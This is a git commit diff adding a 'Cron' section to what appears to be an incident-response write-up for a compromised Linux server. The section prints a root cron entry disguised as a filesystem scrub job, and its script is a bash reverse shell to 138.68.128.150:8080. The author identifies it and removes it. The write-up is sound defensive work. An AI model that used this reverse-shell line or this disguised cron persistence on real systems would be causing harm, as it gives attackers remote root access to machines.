Cronjob done
parent
0c57c12ac8
commit
fae286bc42
|
@ -481,5 +481,46 @@ root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
|
||||||
|
|
||||||
This is all I found suspicious in the DNS configuration.
|
This is all I found suspicious in the DNS configuration.
|
||||||
|
|
||||||
|
### Cron
|
||||||
|
|
||||||
|
Susipicious cron jobs:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# cat e2scrub_all
|
||||||
|
MAILTO=""
|
||||||
|
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
|
||||||
|
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
|
||||||
|
5-55/10 * * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/xfsscrub_all -A -r
|
||||||
|
```
|
||||||
|
|
||||||
|
The third script has a reverse shell in it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# cat /sbin/xfsscrub_all
|
||||||
|
#!/bin/bash
|
||||||
|
/bin/bash -i >& /dev/tcp/138.68.128.150/8080 || true >> /dev/null 0>&1 2>&1
|
||||||
|
```
|
||||||
|
|
||||||
|
Remove the entry from the cron.
|
||||||
|
And restart the cron service.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# systemctl restart cron
|
||||||
|
```
|
||||||
|
|
||||||
|
And checked this one it is also safe:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# cat sysstat
|
||||||
|
# The first element of the path is a directory where the debian-sa1
|
||||||
|
# script is located
|
||||||
|
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
|
||||||
|
|
||||||
|
# Activity reports every 10 minutes everyday
|
||||||
|
5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
|
||||||
|
|
||||||
|
# Additional run at 23:59 to rotate the statistics file
|
||||||
|
59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue